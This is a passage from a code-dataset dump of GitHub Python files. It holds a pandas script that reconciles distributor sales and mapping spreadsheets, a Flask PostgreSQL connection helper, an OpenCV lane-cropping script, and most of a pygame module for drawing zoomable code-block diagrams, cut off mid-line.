Code'])\r\nRollout=ak10[ak10['Current status']=='Complete']\r\nSap=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\SAPT.xlsx\")\r\nMap=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Mapped.xlsx\")\r\nSync=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Sync.xlsx\")\r\nTally=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Tally.xlsx\")\r\nTally=Tally[['Distributors Code']]\r\nTally=Tally.drop_duplicates(subset=['Distributors Code'],keep='first')\r\nSap1=Sap[['Sold To Party','Sold To Party Name']]\r\nSap1=Sap1.drop_duplicates(subset=['Sold To Party'],keep='first')\r\nRollout=pd.merge(Rollout,Sap1,left_on='Distributor SAP Code',right_on='Sold To Party',how='left')\r\nSync1=Sync[['Distributor Code','Distributor Name']]\r\nSync1=Sync1.drop_duplicates(subset=['Distributor 
Code'],keep='first')\r\nRollout=pd.merge(Rollout,Sync1,left_on='Distributor SAP Code',right_on='Distributor Code',how='left')\r\nRollout=Rollout.rename(columns={'Distributor Name':'Sync Distributor Name'})\r\nMap1=Map[['Distributor Code','Distributor Name']]\r\nMap1=Map1.drop_duplicates(subset=['Distributor Code'],keep='first')\r\nRollout=pd.merge(Rollout,Map1,left_on='Distributor SAP Code',right_on='Distributor Code',how='left')\r\nRollout=Rollout.rename(columns={'Sold To Party Name':'Sap Distributor Name','Distributor Name':'DMS Distributor Name'})\r\nRollout=Rollout[['Distributor SAP Code','Biz (B2B or B2C)',\"Distributors Name\",'Current status','Installation Start','Installation End','Sap Distributor Name','Sync Distributor Name','DMS Distributor Name']]\r\nSap2=pd.merge(Sap,Rollout,left_on='Sold To Party',right_on='Distributor SAP Code',how='left')\r\nSap2=Sap2.drop(columns=['Biz (B2B or B2C)',\"Distributors Name\",'Current status','Sap Distributor Name','Sync Distributor Name','DMS Distributor Name'])\r\nSap2['Distributor SAP Code']=Sap2['Distributor SAP Code'].fillna(0)\r\nSap2=Sap2[Sap2['Distributor SAP Code']!=0]\r\nSap2=Sap2.drop(columns=['Distributor SAP Code'])\r\nMap2=pd.merge(Map,Rollout,left_on='Distributor Code',right_on='Distributor SAP Code',how='left')\r\nMap2=Map2.drop(columns=['Biz (B2B or B2C)','Distributors Name','Current status','Sap Distributor Name','Sync Distributor Name','DMS Distributor Name'])\r\nMap2['Distributor SAP Code']=Map2['Distributor SAP Code'].fillna(0)\r\nMap2=Map2[Map2['Distributor SAP Code']!=0]\r\nMap2=Map2.drop(columns=['Distributor SAP Code'])\r\nSap2['Code-Mat']=Sap2['Sold To Party'].astype(str)+Sap2['Material'].astype(str)\r\nMap2['Code-Mat1']=Map2['Distributor Code'].astype(str)+Map2['DMS Item Code'].astype(str)\r\nSap3=Sap2.drop_duplicates(subset=['Code-Mat'],keep='first')\r\nMap3=Map2[['Code-Mat1']]\r\nSap3=pd.merge(Sap3,Map3,left_on='Code-Mat',right_on='Code-Mat1',how='left')\r\nSap3=Sap3.drop_duplicates(subset=['Code-Mat'],keep='first')\r\nSap4=Sap3\r\nSap4['Code-Mat1']=Sap4['Code-Mat1'].fillna(0)\r\nSap4=Sap4[Sap4['Code-Mat1']==0]\r\nSap4=Sap4.drop(columns=['Code-Mat1'])\r\nSap4=pd.merge(Sap4,Tally,left_on='Sold To Party',right_on='Distributors Code',how='left')\r\nSap4=Sap4.rename(columns={'Distributors Code':'Tally'})\r\nSap4.loc[Sap4['Tally']>0,'Tally']='Y'\r\nSap4['Tally']=Sap4['Tally'].fillna('N')\r\nSap5=Sap4.pivot_table(index=['Tally','Sold To Party','Sold To Party Name','Material','Material Desc'],values=['Billing Quantity'])\r\nRollout['Distributor SAP code verify is correct per SAP']=Rollout['Sap Distributor Name']==Rollout['Sync Distributor Name']\r\nRollout=pd.merge(Rollout,Tally,left_on='Distributor SAP Code',right_on='Distributors Code',how='left')\r\nRollout=Rollout.rename(columns={'Distributors Code':'Tally'})\r\nRollout.loc[Rollout['Tally']>0,'Tally']='Y'\r\nRollout['Tally']=Rollout['Tally'].fillna('N')\r\ndell=Sap4[['Sold To Party','Material']]\r\ndell=dell.groupby(['Sold To Party']).count()\r\ndell=dell.reset_index()\r\ndell=dell.rename(columns={'Sold To Party':'Distributor SAP Code'})\r\nRollout=pd.merge(Rollout,dell,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nRollout=Rollout.rename(columns={'Material':'Sap sale Sku code check with DMS mapped items'})\r\nRollout['Sap sale Sku code check with DMS mapped items']=Rollout['Sap sale Sku code check with DMS mapped items'].fillna('OK')\r\nRollout=Rollout.drop_duplicates(subset=['Distributor SAP 
Code'],keep='first')\r\nSap3=Sap3.drop(columns=['Installation Start','Installation End'])\r\nSap4=Sap4.drop(columns=['Installation Start','Installation End'])\r\n#table= pd.pivot_table(Rollout, values='Distributor SAP Code', index=['Current status'],columns=['Biz (B2B or B2C)'], aggfunc=np.counts())\r\nwrite=pd.ExcelWriter('Total_Rollout_Status.xlsx',engine='xlsxwriter')\r\nak10.to_excel(write,sheet_name='Rollout data',index=False)\r\nRollout.to_excel(write,sheet_name='Complete Only',index=False)\r\n#Sap2.to_excel(write,sheet_name='Sales data',index=False)\r\nSap3.to_excel(write,sheet_name='Sales Unique data',index=False)\r\n#Map2.to_excel(write,sheet_name='DMS data',index=False)\r\nSap4.to_excel(write,sheet_name='Pending Item code',index=False)\r\n#dell.to_excel(write,sheet_name='count')\r\nSap5.to_excel(write,sheet_name='Table')\r\n#table.to_excel(write,sheet_name='summary')\r\nwrite.save()\r\n","repo_name":"vakhileshni/bunge","sub_path":"Total_Rollout.py","file_name":"Total_Rollout.py","file_ext":"py","file_size_in_byte":9444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21496888400","text":"from dotenv import load_dotenv\nfrom os import getenv\nfrom flask import g\nimport psycopg2\n\n\nload_dotenv()\n\n\ndef init_app(app):\n app.teardown_appcontext(close_connection)\n\n\ndef get_connection():\n if 'connection' not in g:\n g.connection = psycopg2.connect(\n dbname=getenv('DB_NAME', 'app'),\n user=getenv('DB_USER', 'app'),\n password=getenv('DB_PASSWORD', 'admin123'),\n host=getenv('DB_HOST', 'db')\n )\n return g.connection\n\n\ndef close_connection(exception=None):\n # Flask passes the teardown exception (if any) to this callback,\n # so it must accept one argument\n connection = g.pop('connection', None)\n\n if connection is not None:\n connection.close()\n","repo_name":"dariusz-dudek/flask-api","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"35255143512","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2 as cv\n\nimage = cv.imread('road.png')\nimage = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n\nprint(image.shape)\nheight = image.shape[0]\nwidth = image.shape[1]\n\n#create triangle of our lane\nregion_of_interest_vertices = [\n (0, height),\n (width/2, height/2),\n (width, height)\n]\n\ndef region_of_interest(img, vertices):\n mask = np.zeros_like(img)\n channel_count = img.shape[2]\n match_mask_color = (255,) * channel_count # (255,255,255)\n cv.fillPoly(mask, vertices, match_mask_color)\n #plt.imshow(mask)\n masked_image = cv.bitwise_and(img, mask) # use the img parameter, not the global image\n return masked_image\n\ncropped_image = region_of_interest(image,\n np.array([region_of_interest_vertices], np.int32))\nplt.imshow(cropped_image)\nplt.show()","repo_name":"Thesirloc/OpenCV-learn","sub_path":"road_lane_1.py","file_name":"road_lane_1.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32470194241","text":"from math import sin, cos, tan, pi, atan2\nimport time\n\nimport pygame\nimport pygame.locals as pgl\nfrom . 
import keyboard\n\nbkgColour = (255, 255, 255)\nbdrColour = (224, 224, 224)\nblkColour = (192, 192, 255)\nifColour = (192, 255, 192)\npsColour = (255, 255, 192)\ndefColour = (192, 255, 255)\ntryColour = (255, 232, 192)\nescColour = (240, 192, 255)\nesrColour = (192, 0, 255)\nselColour = ( 0, 0, 224)\ninsColour = (255, 0, 255)\n\nmPtColour = (128, 128, 255)\nmSlColour = (128, 224, 255)\nmHlColour = ( 0, 255, 128)\n\ntrcColour = (255, 0, 255)\nfTxColour = ( 0, 0, 224)\nvTxColour = ( 0, 0, 0)\ntx4Colour = (240, 240, 255)\ntEsColour = (255, 240, 255) # Loop escape root text background\ncsrColour = ( 0, 0, 0)\ncmtColour = (255, 255, 192) # Comment background\nrnbColour = (192, 192, 192) # Route name background\n\nresolution = 5\nmaxSegments = 96\n\nibeam_strings = ( #sized 8x16\n \"ooo ooo \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \"ooo ooo \")\n\nrepeatLag = 0.2\nrepeatRate = 0.05\n\nclass RectType(object):\n Boundary = (bdrColour, None, 1)\n Border = ((0,0,0), None, 2)\n Solid = ((0,0,0), blkColour, 1)\n Pass = ((0,0,0), psColour, 1)\n If = ((0,0,0), ifColour, 1)\n Def = ((0,0,0), defColour, 1)\n Try = ((0,0,0), tryColour, 2)\n Hole = ((0,0,0), bkgColour, 2)\n Escape = ((0,0,0), escColour, 1)\n Selected = (selColour, None, 3)\n Insert = (None, insColour, 1)\n\nclass Painter(object):\n zoomSpeed = 1.5\n panSpeed = 1.2\n\n def __init__(self, masterBlock, screen):\n self.masterBlock = masterBlock\n self.masterBlock.g_treeModified = True\n self.screenSize = screen.get_size()\n self.screen = pygame.Surface(self.screenSize)\n self.drawing = False\n\n # Default positioning.\n self.screenArea = 0.25 * self.screenSize[0] * self.screenSize[1]\n self.drawBlock = self.masterBlock # Smallest encapsulating block.\n self.drawingPlacement = RelativePlacement(scale=0.667, shape=1.618,\n pos=(self.screenSize[0]/2.,\n self.screenSize[1]/2.),\n area=1.618)\n\n self.cycle = 0\n self.updateTime = time.time()\n self.focusing = False\n\n def reset(self, masterBlock=None):\n 'resets the view'\n if masterBlock:\n self.masterBlock = masterBlock\n self.masterBlock.g_treeModified = True\n\n # Default positioning.\n self.screenArea = 0.25 * self.screenSize[0] * self.screenSize[1]\n self.drawBlock = self.masterBlock # Smallest encapsulating block.\n self.drawingPlacement = RelativePlacement(scale=0.667, shape=1.618,\n pos=(self.screenSize[0]/2.,\n self.screenSize[1]/2.),\n area=1.618)\n\n self.focusing = False\n\n def drawChild(self, block, absPlacement):\n '''internal.\n area is (xy)_child\n shape is x_child / y_child\n\n absPlacement will become the block's g_absPlacement.\n '''\n block.g_cycle = self.cycle\n block.g_absPlacement = absPlacement\n\n # Check if this block encapsulates the screen.\n if self.checkDrawBlockCandidate(block):\n # Block is completely off the screen. 
Don't draw.\n return\n\n # Draw the border.\n block.g_border.draw(self.screen)\n\n # Check for size cutoff.\n if block.g_sizeCutoff != None and \\\n absPlacement.scale < block.g_sizeCutoff:\n for f in block.g_cutoffFeatures:\n f.draw(self.screen)\n else:\n # Draw the features.\n for f in block.g_features:\n f.draw(self.screen)\n\n # Draw the children.\n for ch in block.g_children:\n # Set new settings.\n newPlacement = absPlacement.add(ch.g_relPlacement,\n self.screenArea)\n\n self.drawChild(ch, newPlacement)\n\n # Draw the connections.\n for f in block.g_connections:\n f.draw(self.screen)\n for f in block.g_interactiveFeatures:\n f.draw(self.screen)\n\n def addFeature(self, feature):\n '''internal.\n Adds the specified interactive feature to the block's layout.'''\n # Add it.\n self.nodeStack[-1][2].append(feature)\n # Draw it.\n feature.draw(self)\n\n def lineIntersectsScreenEdge(self, p1, p2):\n '''internal.\n Tests whether the specified line segment intersects any of the edges\n of the screen.'''\n X, Y = self.screenSize\n\n # 1. Test for both off the same side.\n if (p1[0] < 0 and p2[0] < 0) or (p1[1] < 0 and p2[1] < 0):\n return False\n if (p1[0] > X and p2[0] > X) or (p1[1] > Y and p2[1] > Y):\n return False\n\n # 2. Test for intersecting top or bottom.\n if p1[1] != p2[1]:\n c = p2[0] - p2[1]*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c > 0 and c < X:\n return True\n c = p2[0] - (p2[1]-Y)*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c > 0 and c < X:\n return True\n\n # 3. Test for intersecting left or right.\n if p1[0] != p2[0]:\n c = p2[1] - p2[0]*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c > 0 and c < Y:\n return True\n c = p2[1] - (p2[0]-X)*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c > 0 and c < Y:\n return True\n\n return False\n\n def getLineScreenFlags(self, p1, p2):\n '''internal.\n Tests whether the specified line segment intersects any of the edges\n of the screen, and returns a set of flags indicating which sides of\n the screen they cross.'''\n X, Y = self.screenSize\n\n # 1. Test for both off the same side.\n if (p1[0] < 0 and p2[0] < 0):\n if (p1[1] > 0 and p1[1] < Y) or (p2[1] > 0 and p2[1] < Y):\n return set('L') # Crosses left side.\n if (p1[1] < 0 and p2[1] > Y) or (p2[1] < 0 and p1[1] > Y):\n return set('L')\n return set()\n if (p1[1] < 0 and p2[1] < 0):\n if (p1[0] > 0 and p1[0] < X) or (p2[0] > 0 and p2[0] < X):\n return set('T') # Crosses top.\n if (p1[0] < 0 and p2[0] > X) or (p2[0] < 0 and p1[0] > X):\n return set('T')\n return set()\n if (p1[0] > X and p2[0] > X):\n if (p1[1] > 0 and p1[1] < Y) or (p2[1] > 0 and p2[1] < Y):\n return set('R') # Crosses right side.\n if (p1[1] < 0 and p2[1] > Y) or (p2[1] < 0 and p1[1] > Y):\n return set('R')\n return set()\n if (p1[1] > Y and p2[1] > Y):\n if (p1[0] > 0 and p1[0] < X) or (p2[0] > 0 and p2[0] < X):\n return set('B') # Crosses bottom.\n if (p1[0] < 0 and p2[0] > X) or (p2[0] < 0 and p1[0] > X):\n return set('B')\n return set()\n\n # 2. Test for intersecting top or bottom.\n result = set()\n if p1[1] != p2[1]:\n c1 = p2[0] - p2[1]*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c1 > 0 and c1 < X:\n return None\n c2 = p2[0] - (p2[1]-Y)*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c2 > 0 and c2 < X:\n return None\n if c1 < 0 and c2 < 0:\n result.add('L')\n elif c1 > X and c2 > X:\n result.add('R')\n else:\n return None\n\n # 3. 
Test for intersecting left or right.\n if p1[0] != p2[0]:\n c1 = p2[1] - p2[0]*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c1 > 0 and c1 < Y:\n return None\n c2 = p2[1] - (p2[0]-X)*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c2 > 0 and c2 < Y:\n return None\n if c1 < 0 and c2 < 0:\n result.add('T')\n elif c1 > Y and c2 > Y:\n result.add('B')\n else:\n return None\n\n return result\n\n def checkDrawBlock(self):\n '''internal.\n Checks whether the current drawBlock does actually encapsulate the\n screen area, and fixes it if not.'''\n W, H = self.screenSize\n\n # We can't possibly look further out than the master block.\n if self.drawBlock == self.masterBlock:\n return\n\n shape = self.drawingPlacement.shape\n area = self.drawingPlacement.area\n width = (shape * area) ** 0.5\n height = (area / shape) ** 0.5\n pts = []\n for p in ((-width,height),(-width,-height),(width,-height),(width,height)):\n q = self.drawingPlacement.parentPoint(p, self.screenArea)\n pts.append(q)\n # Check if the point lies within the screen area.\n if q[0]>0 and q[0]<W and q[1]>0 and q[1]<H:\n # A corner of the block is visible on screen, so the block\n # no longer encapsulates the view: step out to its parent.\n self.drawBlock = self.drawBlock.parent\n self.masterBlock.g_treeModified = True\n return\n\n def maybeNav(self):\n '''internal.\n Advances the focusing animation by one frame, if one is active.'''\n t = time.time()\n dTime = t - self.updateTime\n self.updateTime = t\n if not self.focusing:\n return\n\n # Drop focus targets that have already been drawn this cycle.\n while len(self.focusTargets) > 1 and \\\n self.focusTargets[-2].g_cycle == self.cycle:\n self.focusTargets.pop()\n\n # Now pan and zoom the block towards the centre of the screen.\n pt = self.focusTargets[-1].g_absPlacement.pos\n finished = 0\n\n # Pan towards the screen centre.\n scC = [0.5*i for i in self.screenSize]\n dist = dTime * self.panSpeed * (self.screenArea ** 0.5)\n dPos = tuple(scC[i] - pt[i] for i in (0,1))\n targetDist = (dPos[0]**2 + dPos[1]**2) ** 0.5\n if dist < targetDist:\n # Doesn't reach the exact centre.\n ratio = dist / targetDist\n dPos = tuple(i * ratio for i in dPos)\n else:\n finished = 1\n self.pan(dPos)\n pt = tuple(pt[i] + dPos[i] for i in (0,1))\n\n # 2. Zoom component.\n sc = self.focusTargets[-1].g_absPlacement.scale\n relAmount = dTime * self.zoomSpeed\n if sc < 0.7:\n # Going in.\n relScale = 8 ** relAmount\n if sc * relScale >= 0.7:\n relScale = 0.7 / sc\n finished = finished + 1\n else:\n # Going out.\n relScale = 8 ** -relAmount\n if sc * relScale <= 0.7:\n relScale = 0.7 / sc\n finished = finished + 1\n pt = scC # tuple(scC[i]-pt[i] for i in (0,1))\n self.zoom(relScale, pt)\n\n # Check if we're there yet.\n if finished >= 2 and len(self.focusTargets) == 1:\n self.focusing = False\n\n\n def draw(self):\n '''Draws the current view to the screen.'''\n\n if self.drawing:\n return\n\n self.maybeNav()\n\n # Check if it's been modified.\n if not self.masterBlock.g_treeModified:\n return\n\n self.drawing = True\n\n # Check if we need to reset the view.\n if self.drawBlock.master != self.masterBlock:\n self.reset()\n\n\n # Fill the background.\n self.screen.fill(bkgColour)\n\n # Make sure that everything's correctly laid out.\n self.drawBlock.g_nonDrawn = False\n self.drawBlock.g_draw()\n\n # Draw the block.\n self.cycle = (self.cycle + 1) % 2147000000\n self.drawChild(self.drawBlock, self.drawingPlacement)\n\n self.masterBlock.g_treeModified = False\n self.drawing = False\n\n def pan(self, amount):\n '''Pans the view by the specified amount.'''\n if self.drawing:\n return\n\n self.masterBlock.g_treeModified = True\n self.drawingPlacement.pos = [self.drawingPlacement.pos[i] + \\\n amount[i] for i in (0,1)]\n self.checkDrawBlock()\n\n def zoom(self, relScale, centre=None):\n '''Zooms the view by the specified amount.'''\n if self.drawing:\n return\n\n self.drawingPlacement.scale = self.drawingPlacement.scale * relScale\n\n # Keep the screen centre fixed.\n if centre == None:\n centre = [0.5*i for i in self.screenSize]\n\n
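 # Added worked example (illustrative): relScale scales the view AREA, so\n # linear distances scale by relScale ** 0.5. With relScale = 4 a feature\n # that sat 100 px right of 'centre' ends up 200 px right of it, while\n # 'centre' itself stays fixed on screen.\n 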
self.drawingPlacement.pos = [centre[i]+(self.drawingPlacement.pos[i]- \\\n centre[i])*(relScale ** 0.5) for i in (0,1)]\n\n self.checkDrawBlock()\n self.masterBlock.g_treeModified = True\n\n def navigate(self, point, amount):\n '''(point, amount) - Navigates the view as if the user had clicked on\n point and dragged the mouse by amount. Returns the new position of the\n point where the user clicked. Horizontal motion moves the point along\n the line joining the point to the centre of the screen. Vertical motion\n zooms towards or away from the point.'''\n\n if self.drawing:\n return\n\n # 1. Pan component.\n scC = [0.5*i for i in self.screenSize]\n if abs(point[1] - scC[1]) < 3 * abs(point[0] - scC[0]):\n dPos = (amount[0], amount[0] * (point[1] - scC[1]) / \\\n (point[0] - scC[0]))\n self.pan(dPos)\n point = tuple(point[i] + dPos[i] for i in (0,1))\n\n # 2. Zoom component.\n self.masterBlock.g_treeModified = True\n relAmount = amount[1] / (self.screenArea ** 0.5)\n relScale = 8 ** relAmount\n self.zoom(relScale, point)\n\n return point\n\n def focusView(self, block):\n '''(block) - starts the view moving towards the specified block.\n If the view is already moving, the view will jump instantly to the\n specified block.'''\n\n # If we're already moving, jump to the block.\n if self.focusing:\n scC = [0.5*i for i in self.screenSize]\n\n # Make sure that every intermediate block's been drawn right.\n b = block\n trail = []\n while b.g_cycle != self.cycle:\n trail.insert(0, b)\n b = b.parent\n if b.g_nonDrawn:\n b = b.parent\n for b2 in trail:\n b2.g_absPlacement = b.g_absPlacement.add(b2.g_relPlacement,\n self.screenArea)\n b = b2\n angle = block.g_absPlacement.angle\n\n # Jump to it.\n self.drawBlock = block\n self.drawingPlacement = RelativePlacement(scC, 0.7, \\\n block.g_relPlacement.shape, block.g_relPlacement.area, \\\n angle)\n self.masterBlock.g_treeModified = True\n\n self.focusing = False\n else:\n self.focusing = 2 # Indicates that we're zooming out.\n\n ft = []\n while True:\n if not block.g_nonDrawn:\n ft.append(block)\n if block == self.masterBlock:\n break\n block = block.parent\n self.focusTargets = ft\n\n def setFocusParent(self, block):\n '''internal.'''\n fp = []\n while True:\n fp.append(block)\n if block == self.masterBlock:\n break\n block = block.parent\n self.focusParents = fp\n\nclass RelativePlacement(object):\n __slots__ = ['pos', 'scale', 'shape', 'area', 'angle']\n # Area parameter controls internal scaling.\n def __init__(self, pos=(0.,0.), scale=1., shape=1.618, area=1., angle=0.):\n self.pos = pos\n self.scale = scale\n self.shape = shape\n self.area = area\n self.angle = angle\n\n def scaleToWidth(self):\n '''internal.\n Scales the drawer object so that the allowed drawing area is from\n (-1, -y) to (1, y) and returns y.'''\n\n self.area = 1. / self.shape\n return self.area\n\n def scaleToHeight(self):\n '''internal.\n Scales the drawer object so that the allowed drawing area is from\n (-x, -1) to (x, 1) and returns x.'''\n\n self.area = self.shape\n return self.area\n\n def scaleDesired(self, desiredShape):\n '''internal.\n Scales so that everything in (-desiredShape, -1.) 
to (desiredShape, 1.)\n is in the view.'''\n\n self.area = max(desiredShape**2 / self.shape, self.shape)\n\n def parentPoint(self, point, parentArea):\n '''Translates a point from this placement to a parent placement.'''\n u, v = point\n\n # Translate to offset from the parent's origin.\n m = (self.scale * parentArea / self.area) ** 0.5\n theta = self.angle\n U = self.pos[0] + m*(u*cos(theta) - v*sin(theta))\n V = self.pos[1] + m*(u*sin(theta) + v*cos(theta))\n\n return U, V\n\n def parentLength(self, x, parentArea):\n '''Translates a length from this placement to the parent placement.'''\n m = (self.scale * parentArea / self.area) ** 0.5\n return m * x\n\n def parentDisplacement(self, s, parentArea):\n '''Translates a displacement vector from this placement to the parent\n placement.'''\n u, v = s\n\n m = (self.scale * parentArea / self.area) ** 0.5\n theta = self.angle\n U = m*(u*cos(theta) - v*sin(theta))\n V = m*(u*sin(theta) + v*cos(theta))\n return U, V\n\n def parentAngle(self, theta):\n '''Translates an angle from this placement to parent placement.'''\n return theta + self.angle\n\n def pointFromParent(self, point, parentArea):\n '''Translates a point from the parent placement to this one.'''\n\n # Translate to offset from this origin.\n X, Y = (point[i] - self.pos[i] for i in (0, 1))\n\n # Translate into local co-ordinates.\n m = (self.area / self.scale / parentArea) ** 0.5\n theta = self.angle\n u = m*(X*cos(theta) + Y*sin(theta))\n v = m*(-X*sin(theta) + Y*cos(theta))\n\n return u, v\n\n def add(self, other, parentArea):\n '''Combines the two placements.'''\n angle = self.angle + other.angle\n area = other.area\n shape = other.shape\n scale = self.scale * other.scale\n pos = self.parentPoint(other.pos, parentArea)\n\n return RelativePlacement(pos=pos, scale=scale, shape=shape, area=area,\n angle=angle)\n\nclass Feature(object):\n '''Defines a feature of a block.'''\n interactive = False\n def draw(self, painter):\n '''Draws the feature.'''\n raise NotImplementedError\n\nclass InteractiveFeature(Feature):\n '''Defines an interactive feature of a block.'''\n interactive = True\n def checkMouseHover(self, point):\n '''Checks if the mouse is over this item and returns True or False\n accordingly.'''\n raise NotImplementedError\n\n def mouseHover(self, screen):\n '''Called when the mouse is over this item.'''\n raise NotImplementedError\n\n def mouseClick(self, actor):\n '''Performs the relevant action when the mouse is clicked over this\n item.'''\n raise NotImplementedError\n\nclass Rectangle(Feature):\n __slots__ = ['block', 'halfWidth', 'halfHeight', 'type', 'pt']\n def __init__(self, block, halfWidth, halfHeight, type=RectType.Boundary, \\\n pt=(0.,0.)):\n self.block = block\n self.halfWidth = halfWidth\n self.halfHeight = halfHeight\n self.type = type\n self.pt = pt\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n halfWidth, halfHeight = self.halfWidth, self.halfHeight\n x0,y0 = self.pt\n x1,y1 = pl.parentPoint((x0-halfWidth, y0-halfHeight), scArea)\n x2,y2 = pl.parentPoint((x0+halfWidth, y0-halfHeight), scArea)\n x3,y3 = pl.parentPoint((x0+halfWidth, y0+halfHeight), scArea)\n x4,y4 = pl.parentPoint((x0-halfWidth, y0+halfHeight), scArea)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n borderColour, fillColour, thickness = self.type\n\n if fillColour:\n pygame.draw.polygon(screen, fillColour, polygon)\n if borderColour:\n pygame.draw.polygon(screen, borderColour, polygon, thickness)\n\nclass Diamond(Feature):\n 
'''Draws a square diamond with semi-axis of size.'''\n __slots__ = ['block', 'pos', 'size']\n def __init__(self, block, pos, size):\n self.block = block\n self.pos = pos\n self.size = size\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n pos, size = self.pos, self.size\n x1,y1 = pl.parentPoint((pos[0], pos[1]-size), scArea)\n x2,y2 = pl.parentPoint((pos[0]+size, pos[1]), scArea)\n x3,y3 = pl.parentPoint((pos[0], pos[1]+size), scArea)\n x4,y4 = pl.parentPoint((pos[0]-size, pos[1]), scArea)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n pygame.draw.polygon(screen, ifColour, polygon)\n pygame.draw.polygon(screen, (0,0,0), polygon, 1)\n\nclass Connection(Feature):\n '''Connects the two points.'''\n __slots__ = ['block', 'pos1', 'pos2', 'theta1', 'theta2', 'colour']\n def __init__(self, block, pos1, pos2, theta1=0., theta2=0., colour=(0,0,0)):\n self.block = block\n self.pos1 = pos1\n self.pos2 = pos2\n self.theta1 = theta1\n self.theta2 = theta2\n self.colour = colour\n\n def drawArc(self, pts, centre, radius, theta1, gamma, thickness):\n '''internal.\n Draws an arc with the given screen coordinates.'''\n hTh = min(thickness/2., abs(radius))\n\n # Calculate the arc length and how many pieces to chop it into.\n arcLen = abs(radius * gamma)\n n = min(int(arcLen / resolution) + 1, maxSegments)\n dGamma = gamma / n\n\n # Calculate a list of points.\n if radius * gamma > 0:\n r1 = radius + hTh\n r2 = radius - hTh\n else:\n r1 = radius - hTh\n r2 = radius + hTh\n\n theta = theta1\n for i in range(n+1):\n cosTheta = cos(theta)\n sinTheta = sin(theta)\n pts.append( (centre[0] + r1*cosTheta, centre[1] + r1*sinTheta))\n pts.insert(0, (centre[0] + r2*cosTheta, centre[1] + r2*sinTheta))\n theta = theta + dGamma\n\n def draw(self, screen):\n '''Draws a smooth connecting line between the two points.'''\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n pos1, pos2, theta1, theta2 = self.pos1, self.pos2, self.theta1, \\\n self.theta2\n\n # Transform to screen coordinates.\n pos1 = pl.parentPoint(pos1, scArea)\n pos2 = pl.parentPoint(pos2, scArea)\n theta1 = pl.parentAngle(theta1)\n theta2 = pl.parentAngle(theta2)\n\n p1off = p2off = False\n # If both points are off the screen, don't draw.\n if not (pos1[0] > 0 < pos1[1] and pos1[0] < scsz[0] and \\\n pos1[1] < scsz[1]):\n p1off = True\n if not (pos2[0] > 0 < pos2[1] and pos2[0] < scsz[0] and \\\n pos2[1] < scsz[1]):\n p2off = True\n if p1off and p2off:\n return\n\n # Calculate line width.\n lw = min(3, int(4 * self.block.g_absPlacement.scale + 1))\n\n # Calculate projection length based on separation.\n pLen = 0.5 * ((pos1[0]-pos2[0])**2+(pos1[1]-pos2[1])**2)**0.5\n\n wholeAngle = atan2(pos2[1]-pos1[1],pos2[0]-pos1[0])\n w1 = cos(theta1 - wholeAngle) ** 2 + 0.1\n w2 = cos(theta2 + pi - wholeAngle) ** 2 + 0.1\n W = w1 + w2\n pLen1 = pLen * w1 / W\n pLen2 = pLen * w2 / W\n\n # Project to find target points.\n pos1a = [pos1[0] + pLen1 * cos(theta1),\n pos1[1] + pLen1 * sin(theta1)]\n pos2a = [pos2[0] - pLen2 * cos(theta2),\n pos2[1] - pLen2 * sin(theta2)]\n\n # Find angle of second target point from first.\n alpha = atan2(pos2a[1]-pos1a[1],pos2a[0]-pos1a[0]) % (2*pi)\n\n # Projected along line between target points.\n pos1b = [pos1a[0] + pLen1 * cos(alpha),\n pos1a[1] + pLen1 * sin(alpha)]\n pos2b = [pos2a[0] - pLen2 * cos(alpha),\n pos2a[1] - pLen2 * sin(alpha)]\n\n # Find the angles between points at target points.\n phi1 = (theta1 
